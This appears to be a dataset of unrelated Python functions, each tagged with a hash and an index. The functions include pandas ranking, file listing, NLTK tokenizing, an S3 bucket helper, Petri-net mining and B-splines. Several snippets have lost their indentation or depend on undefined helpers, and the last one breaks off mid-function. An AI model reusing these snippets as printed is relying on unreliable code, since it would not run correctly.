normal = tf.reduce_sum(tf.stack(normals), axis=0)
if not area_weighted:
normal = tf.nn.l2_normalize(normal, 3)
normal = tf.where(tf.is_nan(normal),
tf.zeros_like(normal), normal)
return normal
|
1b087113d6bc68a24195459ece006c7a74848a63
| 20,156 |
def _ros_group_rank(df, dl_idx, censorship):
"""
Ranks each observation within the data groups.
In this case, the groups are defined by the record's detection
limit index and censorship status.
Parameters
----------
df : pandas.DataFrame
dl_idx : str
Name of the column in the dataframe the index of the
observations' corresponding detection limit in the `cohn`
dataframe.
censorship : str
Name of the column in the dataframe that indicates that a
observation is left-censored. (i.e., True -> censored,
False -> uncensored)
Returns
-------
ranks : numpy.array
Array of ranks for the dataset.
"""
    # (edited for pandas 0.14 compatibility; see commit 63f162e
# when `pipe` and `assign` are available)
ranks = df.copy()
ranks.loc[:, 'rank'] = 1
ranks = (
ranks.groupby(by=[dl_idx, censorship])['rank']
.transform(lambda g: g.cumsum())
)
return ranks
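# Usage sketch (illustrative, not part of the original source): rank
# observations within (detection-limit, censorship) groups of a small
# dataframe; assumes pandas is installed. Column names are hypothetical.
def _example_ros_group_rank():
    import pandas as pd
    df = pd.DataFrame({
        "det_limit_index": [0, 0, 0, 1, 1],
        "censored": [True, False, False, True, False],
    })
    return _ros_group_rank(df, "det_limit_index", "censored")
    # ranks: 1, 1, 2, 1, 1  (cumulative count within each group)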
|
f4495eb57d158745603899086e59643edec1e489
| 20,157 |
def f_all(predicate, iterable):
"""Return whether predicate(i) is True for all i in iterable
>>> is_odd = lambda num: (num % 2 == 1)
>>> f_all(is_odd, [])
True
>>> f_all(is_odd, [1, 3, 5, 7, 9])
True
>>> f_all(is_odd, [2, 1, 3, 5, 7, 9])
False
"""
return all(predicate(i) for i in iterable)
|
c0a0e52587a7afc9da143ac936aab87ad531b455
| 20,158 |
from typing import List
from typing import Tuple
from typing import Set
from typing import Dict
def _recursive_replace(data):
"""Searches data structure and replaces 'nan' and 'inf' with respective float values"""
if isinstance(data, str):
if data == "nan":
return float("nan")
if data == "inf":
return float("inf")
if isinstance(data, List):
return [_recursive_replace(v) for v in data]
if isinstance(data, Tuple):
return tuple([_recursive_replace(v) for v in data])
if isinstance(data, Set):
return set([_recursive_replace(v) for v in data])
if isinstance(data, Dict):
return {k: _recursive_replace(v) for k, v in data.items()}
return data
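# Usage sketch (illustrative, not part of the original source): string
# placeholders are converted back to float values anywhere in a nested
# structure.
def _example_recursive_replace():
    return _recursive_replace({"loss": "inf", "scores": ["nan", 1.5, ("inf",)]})
    # -> {"loss": inf, "scores": [nan, 1.5, (inf,)]}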
|
b5c21d806b462070b2d1eec7d91a5dc700f6b0ed
| 20,159 |
def trans_text_ch_to_vector(txt_file, word_num_map, txt_label=None):
""" Trans chinese chars to vector
:param txt_file:
:param word_num_map:
:param txt_label:
:return:
"""
words_size = len(word_num_map)
to_num = lambda word: word_num_map.get(word.encode('utf-8'), words_size)
    if txt_file is not None:
txt_label = get_ch_lable(txt_file)
labels_vector = list(map(to_num, txt_label))
return labels_vector
|
83370ca18303e1286b099d646362db14cd4b5dbd
| 20,160 |
def adjust_bag(request, item_id):
""" Adjust the quantity of a product to the specified amount"""
quantity = int('0'+request.POST.get('quantity'))
bag = request.session.get('bag', {})
if quantity > 0:
bag[item_id] = quantity
else:
        messages.error(request, 'Value must be greater than or equal to 1.\
If you do not need this product, click on the Remove button.')
request.session['bag'] = bag
return redirect(reverse('view_bag'))
|
a2814adcffbc04ee02b18bd14fc7daf0dbe58677
| 20,161 |
import os
def get_file_paths_in_dir(idp,
ext=None,
target_str_or_list=None,
ignore_str_or_list=None,
base_name_only=False,
without_ext=False,
sort_result=True,
natural_sorting=False,
recursive=False):
""" ext can be a list of extensions or a single extension
(e.g. ['.jpg', '.png'] or '.jpg')
"""
if recursive:
ifp_s = []
for root, dirs, files in os.walk(idp):
ifp_s += [os.path.join(root, ele) for ele in files]
else:
ifp_s = [os.path.join(idp, ele) for ele in os.listdir(idp)
if os.path.isfile(os.path.join(idp, ele))]
if ext is not None:
if isinstance(ext, list):
ext = [ele.lower() for ele in ext]
check_ext(ext)
ifp_s = [ifp for ifp in ifp_s if os.path.splitext(ifp)[1].lower() in ext]
else:
ext = ext.lower()
check_ext(ext)
ifp_s = [ifp for ifp in ifp_s if os.path.splitext(ifp)[1].lower() == ext]
if target_str_or_list is not None:
if type(target_str_or_list) == str:
target_str_or_list = [target_str_or_list]
for target_str in target_str_or_list:
ifp_s = [ifp for ifp in ifp_s if target_str in os.path.basename(ifp)]
if ignore_str_or_list is not None:
if type(ignore_str_or_list) == str:
ignore_str_or_list = [ignore_str_or_list]
for ignore_str in ignore_str_or_list:
ifp_s = [ifp for ifp in ifp_s if ignore_str not in os.path.basename(ifp)]
if base_name_only:
ifp_s = [os.path.basename(ifp) for ifp in ifp_s]
if without_ext:
ifp_s = [os.path.splitext(ifp)[0] for ifp in ifp_s]
if sort_result:
if natural_sorting:
ifp_s = sorted(ifp_s, key=natural_key)
else:
ifp_s = sorted(ifp_s)
return ifp_s
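# Usage sketch (illustrative, not part of the original source): list the file
# names in the current directory. Extension filtering additionally relies on
# the check_ext helper referenced above, which is defined elsewhere in the
# original module.
def _example_get_file_paths_in_dir():
    return get_file_paths_in_dir(".", base_name_only=True)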
|
f450f8b5f04c2fb22975e4a46725ae566346a94b
| 20,162 |
def _condexpr_value(e):
"""Evaluate the value of the input expression.
"""
assert type(e) == tuple
assert len(e) in [2, 3]
if len(e) == 3:
if e[0] in ARITH_SET:
return _expr_value(e)
left = _condexpr_value(e[1])
right = _condexpr_value(e[2])
if type(left) != type(right):
# Boolean result expected
return False
elif e[0] == 'and':
return left and right
elif e[0] == 'or':
return left or right
elif e[0] == '=':
return left == right
elif e[0] == '!=':
return left != right
elif e[0] == '>':
return left > right
elif e[0] == '>=':
return left >= right
elif e[0] == '<':
return left < right
elif e[0] == '<=':
return left <= right
elif e[0] == 'not':
return not _condexpr_value(e[1])
elif e[0] in ['string', 'number', 'boolean']:
return e[1]
elif e[0] == 'identifier':
return get_config(e[1])['value']
raise Exception("Unexpected depend list: " + str(e))
|
3973a22b5c5553c2c1b70b94f97be4d54f224766
| 20,163 |
import socket
def in6_isincluded(addr, prefix, plen):
"""
Returns True when 'addr' belongs to prefix/plen. False otherwise.
"""
temp = inet_pton(socket.AF_INET6, addr)
pref = in6_cidr2mask(plen)
zero = inet_pton(socket.AF_INET6, prefix)
return zero == in6_and(temp, pref)
|
4003d9b61ddb8f37207a2d332a31e4ee3a97cad7
| 20,164 |
def vis_channel(model, layer, channel_n):
"""
This function creates a visualization for a single channel in a layer
:param model: model we are visualizing
:type model: lucid.modelzoo
:param layer: the name of the layer we are visualizing
:type layer: string
:param channel_n: The channel number in the layer we are optimizing for
:type channel_n: int
:return: array of pixel values for the visualization
"""
print('Getting vis for ' + layer + ', channel ' + str(channel_n))
l_name = dla_lucid.LAYERS[layer][0]
obj = objectives.channel(l_name, channel_n)
imgs = render.render_vis(model, obj, dla_lucid.PARAM_1D,
thresholds=dla_lucid.THRESH_1D, transforms=dla_lucid.TFORMS_1D, verbose=False)
imgs_array = np.array(imgs)
imgs_reshaped = imgs_array.reshape(400)
return imgs_reshaped
|
b6f1b72be81fa317fc59b3582b9f43afb640a4d6
| 20,165 |
from typing import Tuple
import time
def processing(log: EventLog, causal: Tuple[str, str], follows: Tuple[str, str]):
"""
Applying the Alpha Miner with the new relations
Parameters
-------------
log
Filtered log
causal
Pairs that have a causal relation (->)
follows
Pairs that have a follow relation (>)
Returns
-------------
net
Petri net
im
Initial marking
fm
Final marking
"""
# create list of all events
labels = set()
start_activities = set()
end_activities = set()
for trace in log:
start_activities.add(trace.__getitem__(0))
end_activities.add(trace.__getitem__(len(trace) - 1))
for events in trace:
labels.add(events)
labels = list(labels)
pairs = []
for key, element in causal.items():
for item in element:
if get_sharp_relation(follows, key, key):
if get_sharp_relation(follows, item, item):
pairs.append(({key}, {item}))
# combining pairs
for i in range(0, len(pairs)):
t1 = pairs[i]
for j in range(i, len(pairs)):
t2 = pairs[j]
if t1 != t2:
if t1[0].issubset(t2[0]) or t1[1].issubset(t2[1]):
if get_sharp_relations_for_sets(follows, t1[0], t2[0]) and get_sharp_relations_for_sets(follows,
t1[1],
t2[1]):
new_alpha_pair = (t1[0] | t2[0], t1[1] | t2[1])
if new_alpha_pair not in pairs:
pairs.append((t1[0] | t2[0], t1[1] | t2[1]))
# maximize pairs
cleaned_pairs = list(filter(lambda p: __pair_maximizer(pairs, p), pairs))
# create transitions
net = PetriNet('alpha_plus_net_' + str(time.time()))
label_transition_dict = {}
for label in labels:
if label != 'artificial_start' and label != 'artificial_end':
label_transition_dict[label] = PetriNet.Transition(label, label)
net.transitions.add(label_transition_dict[label])
else:
label_transition_dict[label] = PetriNet.Transition(label, None)
net.transitions.add(label_transition_dict[label])
# and source and sink
src = add_source(net, start_activities, label_transition_dict)
sink = add_sink(net, end_activities, label_transition_dict)
# create places
for pair in cleaned_pairs:
place = PetriNet.Place(str(pair))
net.places.add(place)
for in_arc in pair[0]:
add_arc_from_to(label_transition_dict[in_arc], place, net)
for out_arc in pair[1]:
add_arc_from_to(place, label_transition_dict[out_arc], net)
return net, Marking({src: 1}), Marking({sink: 1}), cleaned_pairs
|
5841c82462432edddddf1b0dfd965b1043bc7277
| 20,166 |
from typing import List
import re
import nltk
def word_tokenize(string: str, language: str = "english") -> List[str]:
"""tokenizes a given string into a list of substrings.
:param string: String to tokenize.
:param language: Language. Either one of ``english'' or ``german''.
"""
if language not in ["english", "german"]:
raise ValueError("language argument has to be either ``english'' or ``german''")
# excessive whitespaces
string = re.sub(r"\s+", " ", string)
# some unicode characters
string = string.replace("’", "'")
string = string.replace("”", '"')
string = string.replace("“", '"')
# floating point (e.g., 1.3 => 1.3)
string = re.sub(r"(\d+)\.(\d+)", r"\g<1>._\g<2>", string)
# percentage (e.g., below.500 => below .500)
string = re.sub(r"(\w+)\.(\d+)", r"\g<1> ._\g<2>", string)
# end of quote
string = string.replace(".``", ". ``")
# number with apostrophe (e.g. '90)
string = re.sub(r"\s'(\d+)", r"' \g<1>", string)
# names with Initials (e.g. C. J. Miles)
string = re.sub(r"(^|\s)(\w)\. (\w)\.", r"\g<1>\g<2>._ \g<3>._", string)
# some dots
string = string.replace("..", " ..")
# names with apostrophe => expands temporarily
string = re.sub(r"\w+'(?!d|s|ll|t|re|ve|\s)", r"\g<0>_", string)
# win-loss scores (German notation seems to be XX:YY, but this is also the time format,
# and the times are not tokenized in the original RotoWire. So we manually handle XX:YY
# expression.
string = re.sub(r"(\d+)-(\d+)", r"\g<1> - \g<2>", string)
string = re.sub(r"(\d+)-of-(\d+)", r"\g<1> - of - \g<2>", string)
# actual tokenization
tokenized = nltk.word_tokenize(string, language=language)
joined = " ".join(tokenized)
# shrink expanded name-with-apostrophe expressions
joined = joined.replace("'_", "'")
# shrink expanded name-with-initial expressions
joined = joined.replace("._", ".")
tokenized = joined.split(" ")
return tokenized
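# Usage sketch (illustrative, not part of the original source): requires the
# NLTK "punkt" tokenizer data to be available (nltk.download("punkt")).
def _example_word_tokenize():
    return word_tokenize("Curry went 11-of-19 from the field for 30 points.")
    # score-like expressions such as "11-of-19" come out as "11 - of - 19"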
|
00cb30031fc5a9e7ddbfcffeae9fad031f463cb3
| 20,167 |
import re
import sys
def get_project_id(file_name):
""" Extracts project ID from intput BAM filename.
:param file_name: string e.g. "/PITT_0452_AHG2THBBXY_A1___P10344_C___13_cf_IGO_10344_C_20___hg19___MD.bam"
:return: string e.g. "P10344_C"
"""
regex = "(?<=___)P[0-9]{5}[_A-Z,a-z]*(?=___)" # Valid project ID is "P" + 5 numbers + (optional) [ "_" + 2 letters]
matches = re.findall(regex, file_name)
if len(matches) == 0:
print("ERROR: Could not find IGO ID in filename: %s with regex: \"%s\"" % (file_name, regex))
sys.exit(1)
if len(matches) > 1:
print("WARNING: More than one match: %s" % str(matches))
return matches[0]
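# Usage sketch (illustrative, not part of the original source), reusing the
# filename from the docstring above.
def _example_get_project_id():
    bam = "/PITT_0452_AHG2THBBXY_A1___P10344_C___13_cf_IGO_10344_C_20___hg19___MD.bam"
    return get_project_id(bam)   # -> "P10344_C"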
|
fea6447851aa3b0fe0983db28e3f7707f315063a
| 20,168 |
import torch
import numpy as np
def modify_scaffolds_with_coords(scaffolds, coords):
""" Gets scaffolds and fills in the right data.
Inputs:
* scaffolds: dict. as returned by `build_scaffolds_from_scn_angles`
* coords: (L, 14, 3). sidechainnet tensor. same device as scaffolds
Outputs: corrected scaffolds
"""
# calculate distances and update:
# N, CA, C
scaffolds["bond_mask"][1:, 0] = torch.norm(coords[1:, 0] - coords[:-1, 2], dim=-1) # N
scaffolds["bond_mask"][ :, 1] = torch.norm(coords[ :, 1] - coords[: , 0], dim=-1) # CA
scaffolds["bond_mask"][ :, 2] = torch.norm(coords[ :, 2] - coords[: , 1], dim=-1) # C
# O, CB, side chain
selector = np.arange(len(coords))
for i in range(3, 14):
# get indexes
idx_a, idx_b, idx_c = scaffolds["point_ref_mask"][:, :, i-3] # (3, L, 11) -> 3 * (L, 11)
# correct distances
scaffolds["bond_mask"][:, i] = torch.norm(coords[:, i] - coords[selector, idx_c], dim=-1)
# get angles
scaffolds["angles_mask"][0, :, i] = get_angle(coords[selector, idx_b],
coords[selector, idx_c],
coords[:, i])
# handle C-beta, where the C requested is from the previous aa
if i == 4:
# for 1st residue, use position of the second residue's N
first_next_n = coords[1, :1] # 1, 3
# the c requested is from the previous residue
main_c_prev_idxs = coords[selector[:-1], idx_a[1:]]# (L-1), 3
# concat
coords_a = torch.cat([first_next_n, main_c_prev_idxs])
else:
coords_a = coords[selector, idx_a]
# get dihedrals
scaffolds["angles_mask"][1, :, i] = get_dihedral(coords_a,
coords[selector, idx_b],
coords[selector, idx_c],
coords[:, i])
# correct angles and dihedrals for backbone
scaffolds["angles_mask"][0, :-1, 0] = get_angle(coords[:-1, 1], coords[:-1, 2], coords[1: , 0]) # ca_c_n
scaffolds["angles_mask"][0, 1:, 1] = get_angle(coords[:-1, 2], coords[1:, 0], coords[1: , 1]) # c_n_ca
scaffolds["angles_mask"][0, :, 2] = get_angle(coords[:, 0], coords[ :, 1], coords[ : , 2]) # n_ca_c
# N determined by previous psi = f(n, ca, c, n+1)
scaffolds["angles_mask"][1, :-1, 0] = get_dihedral(coords[:-1, 0], coords[:-1, 1], coords[:-1, 2], coords[1:, 0])
# CA determined by omega = f(ca, c, n+1, ca+1)
scaffolds["angles_mask"][1, 1:, 1] = get_dihedral(coords[:-1, 1], coords[:-1, 2], coords[1:, 0], coords[1:, 1])
# C determined by phi = f(c-1, n, ca, c)
scaffolds["angles_mask"][1, 1:, 2] = get_dihedral(coords[:-1, 2], coords[1:, 0], coords[1:, 1], coords[1:, 2])
return scaffolds
|
6d0853c3749fbf251cb3147109dab8951603c99c
| 20,169 |
import pickle
from .stem import _classification_textcleaning_stemmer
def multinomial(**kwargs):
"""
Load multinomial toxicity model.
Parameters
----------
validate: bool, optional (default=True)
if True, malaya will check model availability and download if not available.
Returns
-------
BAYES : malaya._models._sklearn_model.MULTILABEL_BAYES class
"""
check_file(
PATH_TOXIC['multinomial'], S3_PATH_TOXIC['multinomial'], **kwargs
)
try:
with open(PATH_TOXIC['multinomial']['model'], 'rb') as fopen:
multinomial = pickle.load(fopen)
with open(PATH_TOXIC['multinomial']['vector'], 'rb') as fopen:
vectorize = pickle.load(fopen)
except:
raise Exception(
"model corrupted due to some reasons, please run malaya.clear_cache('toxic/multinomial') and try again"
)
return MULTILABEL_BAYES(
models = multinomial,
vectors = vectorize,
cleaning = _classification_textcleaning_stemmer,
)
|
78bb3ceffefd6b38c304758eda8c0bafe36462ab
| 20,170 |
import logging
import boto3
from botocore.exceptions import ClientError
def create_bucket(bucket_name, region="us-west-2"):
"""Create an S3 bucket in a specified region
:param bucket_name: Bucket to create
:param region: String region to create bucket in, e.g., 'us-west-2'
    :return: the boto3 S3 client if the bucket exists or was created, else None
"""
# Create bucket
try:
# get list of existing buckets
s3_client = boto3.client('s3', region_name=region)
list_buckets = s3_client.list_buckets()
for bucket in list_buckets['Buckets']:
if bucket["Name"] == bucket_name:
print("------- Bucket already exists")
return s3_client
location = {'LocationConstraint': region}
s3_client.create_bucket(Bucket=bucket_name,
CreateBucketConfiguration=location)
return s3_client
except ClientError as e:
logging.error(e)
return
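# Usage sketch (illustrative, not part of the original source): requires valid
# AWS credentials; the bucket name below is hypothetical and would need to be
# globally unique.
def _example_create_bucket():
    return create_bucket("my-example-logs-bucket", region="us-west-2")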
|
c2d655982563c233a027dc94f9b73e8899aeddb7
| 20,171 |
def create_client():
"""Return a client socket that may be connected to a remote address."""
return _new_sock()
|
5d0515c731d4c087c7b118923aa579d4bcd1e881
| 20,172 |
import warnings
import copy
def derivative_surface(obj):
""" Computes the hodograph (first derivative) surface of the input surface.
This function constructs the hodograph (first derivative) surface from the input surface by computing the degrees,
knot vectors and the control points of the derivative surface.
The return value of this function is a tuple containing the following derivative surfaces in the given order:
* U-derivative surface (derivative taken only on the u-direction)
* V-derivative surface (derivative taken only on the v-direction)
* UV-derivative surface (derivative taken on both the u- and the v-direction)
:param obj: input surface
:type obj: abstract.Surface
:return: derivative surfaces w.r.t. u, v and both u-v
:rtype: tuple
"""
if not isinstance(obj, abstract.Surface):
raise TypeError("Input shape must be an instance of abstract.Surface class")
if obj.rational:
warnings.warn("Cannot compute hodograph surface for a rational surface")
return obj
# Find the control points of the derivative surface
d = 2 # 0 <= k + l <= d, see pg. 114 of The NURBS Book, 2nd Ed.
pkl = evaluators.SurfaceEvaluator2.derivatives_ctrlpts(r1=0, r2=obj.ctrlpts_size_u - 1,
s1=0, s2=obj.ctrlpts_size_v - 1,
degree_u=obj.degree_u, degree_v=obj.degree_v,
ctrlpts_size_u=obj.ctrlpts_size_u,
ctrlpts_size_v=obj.ctrlpts_size_v,
knotvector_u=obj.knotvector_u, knotvector_v=obj.knotvector_v,
ctrlpts=obj.ctrlpts2d,
dimension=obj.dimension,
deriv_order=d)
ctrlpts2d_u = []
for i in range(0, len(pkl[1][0]) - 1):
ctrlpts2d_u.append(pkl[1][0][i])
surf_u = copy.deepcopy(obj)
surf_u.degree_u = obj.degree_u - 1
surf_u.ctrlpts2d = ctrlpts2d_u
surf_u.knotvector_u = obj.knotvector_u[1:-1]
surf_u.delta = obj.delta
ctrlpts2d_v = []
for i in range(0, len(pkl[0][1])):
ctrlpts2d_v.append(pkl[0][1][i][0:-1])
surf_v = copy.deepcopy(obj)
surf_v.degree_v = obj.degree_v - 1
surf_v.ctrlpts2d = ctrlpts2d_v
surf_v.knotvector_v = obj.knotvector_v[1:-1]
surf_v.delta = obj.delta
ctrlpts2d_uv = []
for i in range(0, len(pkl[1][1]) - 1):
ctrlpts2d_uv.append(pkl[1][1][i][0:-1])
    # Generate the derivative surface
surf_uv = obj.__class__()
surf_uv.degree_u = obj.degree_u - 1
surf_uv.degree_v = obj.degree_v - 1
surf_uv.ctrlpts2d = ctrlpts2d_uv
surf_uv.knotvector_u = obj.knotvector_u[1:-1]
surf_uv.knotvector_v = obj.knotvector_v[1:-1]
surf_uv.delta = obj.delta
return surf_u, surf_v, surf_uv
|
f9b846c0b2b17e315ae4b98138719361675df557
| 20,173 |
def configure(config):
"""
| [bing ] | example | purpose |
| -------- | ------- | ------- |
| api_key | VBsdaiY23sdcxuNG1gP+YBsCwJxzjfHgdsXJG5 | Bing Primary Account Key |
"""
chunk = ''
if config.option('Configuring bing search module', False):
config.interactive_add('bing', 'api_key', 'Bing Primary Account Key', '')
return chunk
|
87ccd4694cfbf34d24e6e31f2b485aaa465ba68b
| 20,174 |
def CVRMSE(ip1,ip2):
""" The normalized RMSE (= Root Mean Square Error) is defined as CVRMSE(X,Y) = sqrt[ sum_i(Yi-Xi)^2 / N ] / mean(Yi) ) """
stats = ip1.getStatistics()
return RMSE(ip1,ip2) / stats.mean
|
0981637da92d2a60c6281f216587fa5bc798d554
| 20,175 |
def get_verified_aid_pairs(ibs):
"""
Example:
>>> # DISABLE_DOCTEST
>>> from wbia_cnn._plugin import * # NOQA
>>> import wbia
>>> ibs = wbia.opendb('NNP_Master3', allow_newdir=True)
>>> verified_aid1_list, verified_aid2_list = get_verified_aid_pairs(ibs)
"""
# Grab marked hard cases
am_rowids = ibs._get_all_annotmatch_rowids()
remove_photobombs = True
if remove_photobombs:
flags = ibs.get_annotmatch_is_photobomb(am_rowids)
am_rowids = ut.filterfalse_items(am_rowids, flags)
verified_aid1_list = ibs.get_annotmatch_aid1(am_rowids)
verified_aid2_list = ibs.get_annotmatch_aid2(am_rowids)
return verified_aid1_list, verified_aid2_list
|
91eb788a6b1f781e5796b03f56292a807aaee60d
| 20,176 |
def audio_sort_key(ex):
"""Sort using duration time of the sound spectrogram."""
return ex.src.size(1)
|
ec940df6bf2b74962f221b84717f51beba5c4f5f
| 20,177 |
from pathlib import Path
def _filename_to_title(filename, split_char="_"):
"""Convert a file path into a more readable title."""
filename = Path(filename).with_suffix("").name
filename_parts = filename.split(split_char)
try:
# If first part of the filename is a number for ordering, remove it
int(filename_parts[0])
if len(filename_parts) > 1:
filename_parts = filename_parts[1:]
except Exception:
pass
title = " ".join(ii.capitalize() for ii in filename_parts)
return title
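# Usage sketch (illustrative, not part of the original source): a numeric
# ordering prefix is stripped and the remaining parts are capitalized.
def _example_filename_to_title():
    return _filename_to_title("01_getting_started.md")   # -> "Getting Started"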
|
f62ae56901f0a58e53e84e63423bcb9f2ccf4c5a
| 20,178 |
import pandas as pd
def basis_function_contributions(universe, mo, mocoefs='coef',
tol=0.01, ao=None, frame=0):
"""
Provided a universe with momatrix and basis_set_order attributes,
return the major basis function contributions of a particular
molecular orbital.
.. code-block:: python
# display the 16th orbital coefficients > abs(0.15)
basis_function_contributions(uni, 15, tol=0.15) # 0-based indexing!
Args:
universe (class:`exatomic.core.universe.Universe`): a universe
mo (int): molecular orbital index
mocoefs (str): column of interest in universe.momatrix
tol (float): minimum value of coefficient by which to filter
frame (int): frame of the universe (default is zero)
Returns:
joined (pd.DataFrame): a join of momatrix and basis_set_order
"""
small = universe.momatrix.contributions(mo, tol=tol, mocoefs=mocoefs, frame=frame)
chis = small['chi'].values
coefs = small[mocoefs]
coefs.index = chis
    joined = pd.concat([universe.basis_set_order.loc[chis], coefs], axis=1)
if ao is None:
return joined
else:
raise NotImplementedError("not clever enough for that.")
|
afe695d15d3aa43baae0ce7e0dcf2fb84f53c699
| 20,179 |
from sympy import S
def bspline_basis(d, knots, n, x, close=True):
"""The `n`-th B-spline at `x` of degree `d` with knots.
B-Splines are piecewise polynomials of degree `d` [1]_. They are defined on
a set of knots, which is a sequence of integers or floats.
The 0th degree splines have a value of one on a single interval:
>>> from sympy import bspline_basis
>>> from sympy.abc import x
>>> d = 0
>>> knots = range(5)
>>> bspline_basis(d, knots, 0, x)
Piecewise((1, And(x <= 1, x >= 0)), (0, True))
For a given ``(d, knots)`` there are ``len(knots)-d-1`` B-splines defined, that
are indexed by ``n`` (starting at 0).
Here is an example of a cubic B-spline:
>>> bspline_basis(3, range(5), 0, x)
Piecewise((x**3/6, And(x < 1, x >= 0)),
(-x**3/2 + 2*x**2 - 2*x + 2/3, And(x < 2, x >= 1)),
(x**3/2 - 4*x**2 + 10*x - 22/3, And(x < 3, x >= 2)),
(-x**3/6 + 2*x**2 - 8*x + 32/3, And(x <= 4, x >= 3)),
(0, True))
By repeating knot points, you can introduce discontinuities in the
B-splines and their derivatives:
>>> d = 1
>>> knots = [0,0,2,3,4]
>>> bspline_basis(d, knots, 0, x)
Piecewise((-x/2 + 1, And(x <= 2, x >= 0)), (0, True))
It is quite time consuming to construct and evaluate B-splines. If you
need to evaluate a B-splines many times, it is best to lambdify them
first:
>>> from sympy import lambdify
>>> d = 3
>>> knots = range(10)
>>> b0 = bspline_basis(d, knots, 0, x)
>>> f = lambdify(x, b0)
>>> y = f(0.5)
See Also
========
bsplines_basis_set
References
==========
.. [1] http://en.wikipedia.org/wiki/B-spline
"""
knots = [sympify(k) for k in knots]
d = int(d)
n = int(n)
n_knots = len(knots)
n_intervals = n_knots - 1
if n + d + 1 > n_intervals:
raise ValueError('n + d + 1 must not exceed len(knots) - 1')
if d == 0:
result = Piecewise(
(S.One, Interval(knots[n], knots[n + 1], False,
not close).contains(x)),
(0, True)
)
elif d > 0:
denom = knots[n + d + 1] - knots[n + 1]
if denom != S.Zero:
B = (knots[n + d + 1] - x)/denom
b2 = bspline_basis(d - 1, knots, n + 1, x, close)
else:
b2 = B = S.Zero
denom = knots[n + d] - knots[n]
if denom != S.Zero:
A = (x - knots[n])/denom
b1 = bspline_basis(
d - 1, knots, n, x, close and (B == S.Zero or b2 == S.Zero))
else:
b1 = A = S.Zero
result = _add_splines(A, b1, B, b2)
else:
raise ValueError('degree must be non-negative: %r' % n)
return result
|
266a8ef3176e11cc598015ebb963c13ddcee9e31
| 20,180 |
def is_versioned(obj):
"""
Check if a given object is versioned by inspecting some of its attributes.
"""
# before any heuristic, newer versions of RGW will tell if an obj is
# versioned so try that first
if hasattr(obj, 'versioned'):
return obj.versioned
if not hasattr(obj, 'VersionedEpoch'):
# overly paranoid here, an object that is not versioned should *never*
# have a `VersionedEpoch` attribute
if getattr(obj, 'version_id', None):
if obj.version_id is None:
return False
return True # probably will never get here
return False
return True
|
7f5ad90ffce6a8efde50dba47cdc63673ec79f60
| 20,181 |
def preprocess_and_suggest_hyperparams(
task,
X,
y,
estimator_or_predictor,
location=None,
):
"""Preprocess the data and suggest hyperparameters.
Example:
```python
hyperparams, estimator_class, X, y, feature_transformer, label_transformer = \
preprocess_and_suggest_hyperparams("classification", X_train, y_train, "xgb_limitdepth")
model = estimator_class(**hyperparams) # estimator_class is XGBClassifier
model.fit(X, y)
X_test = feature_transformer.transform(X_test)
y_pred = label_transformer.inverse_transform(pd.Series(model.predict(X_test).astype(int)))
```
Args:
task: A string of the task type, e.g.,
'classification', 'regression', 'ts_forecast', 'rank',
'seq-classification', 'seq-regression'.
X: A dataframe of training data in shape n*m.
For 'ts_forecast' task, the first column of X_train
must be the timestamp column (datetime type). Other
columns in the dataframe are assumed to be exogenous
variables (categorical or numeric).
y: A series of labels in shape n*1.
estimator_or_predictor: A str of the learner name or a dict of the learned config predictor.
"choose_xgb" means choosing between xgb_limitdepth and xgboost.
If a dict, it contains:
- "version": a str of the version number.
- "preprocessing": a dictionary containing:
* "center": a list of meta feature value offsets for normalization.
* "scale": a list of meta feature scales to normalize each dimension.
- "neighbors": a list of dictionaries. Each dictionary contains:
* "features": a list of the normalized meta features for a neighbor.
* "choice": a integer of the configuration id in the portfolio.
- "portfolio": a list of dictionaries, each corresponding to a configuration:
* "class": a str of the learner name.
* "hyperparameters": a dict of the config. They key "FLAML_sample_size" will be ignored.
location: (Optional) A str of the location containing mined portfolio file.
Only valid when the portfolio is a str, by default the location is flaml/default.
Returns:
hyperparams: A dict of the hyperparameter configurations.
        estimator_class: A class of the underlying estimator, e.g., lightgbm.LGBMClassifier.
X: the preprocessed X.
y: the preprocessed y.
feature_transformer: a data transformer that can be applied to X_test.
label_transformer: a label transformer that can be applied to y_test.
"""
dt = DataTransformer()
X, y = dt.fit_transform(X, y, task)
if "choose_xgb" == estimator_or_predictor:
# choose between xgb_limitdepth and xgboost
estimator_or_predictor = suggest_learner(
task,
X,
y,
estimator_list=["xgb_limitdepth", "xgboost"],
location=location,
)
config = suggest_config(task, X, y, estimator_or_predictor, location=location, k=1)[
0
]
estimator = config["class"]
model_class = get_estimator_class(task, estimator)
hyperparams = config["hyperparameters"]
model = model_class(task=task, **hyperparams)
if model.estimator_class is None:
return hyperparams, model_class, X, y, None, None
else:
estimator_class = model.estimator_class
X = model._preprocess(X)
hyperparams = hyperparams and model.params
class AutoMLTransformer:
def transform(self, X):
return model._preprocess(dt.transform(X))
transformer = AutoMLTransformer()
return hyperparams, estimator_class, X, y, transformer, dt.label_transformer
|
cd388bea6c9bfbb5d38001c549f2fe92d16aff41
| 20,182 |
def passphrase_from_private_key(private_key):
"""Return passphrase from provided private key."""
return mnemonic.from_private_key(private_key)
|
aed1c465795d22fd80680c0484d377fa6cabf0c8
| 20,183 |
def merge_on_empty_fields(base, tomerge):
"""Utility to quickly fill empty or falsy field of $base with fields
of $tomerge
"""
has_merged_anything = False
for key in tomerge:
if not base.get(key):
base[key] = tomerge.get(key)
has_merged_anything = True
return has_merged_anything
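# Usage sketch (illustrative, not part of the original source): only
# empty/falsy fields of `base` are filled in from `tomerge`.
def _example_merge_on_empty_fields():
    base = {"name": "", "id": 3}
    merged = merge_on_empty_fields(base, {"name": "backup", "id": 99})
    return base, merged   # ({"name": "backup", "id": 3}, True)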
|
f8cb14047d2e17e2155beb1ab86eab7cdf531af0
| 20,184 |
def clear_rows(grid, locked):
"""Deletes the row, if that row is filled."""
increment = 0
for i in range(len(grid) - 1, -1, -1):
row = grid[i]
if (0, 0, 0) not in row:
increment += 1
index = i
for j in range(len(row)):
try:
del locked[(j, i)]
                except KeyError:
continue
if increment > 0:
for key in sorted(list(locked), key=lambda x: x[1])[::-1]:
x, y = key
if y < index:
newKey = (x, y + increment)
locked[newKey] = locked.pop(key)
return increment * 1.5
|
5974a129ac0bb756ee1038f61c9eeaf625ccbb72
| 20,185 |
import shlex
def call(cmd_args, suppress_output=False):
""" Call an arbitary command and return the exit value, stdout, and stderr as a tuple
Command can be passed in as either a string or iterable
>>> result = call('hatchery', suppress_output=True)
>>> result.exitval
0
>>> result = call(['hatchery', 'notreal'])
>>> result.exitval
1
"""
if not funcy.is_list(cmd_args) and not funcy.is_tuple(cmd_args):
cmd_args = shlex.split(cmd_args)
logger.info('executing `{}`'.format(' '.join(cmd_args)))
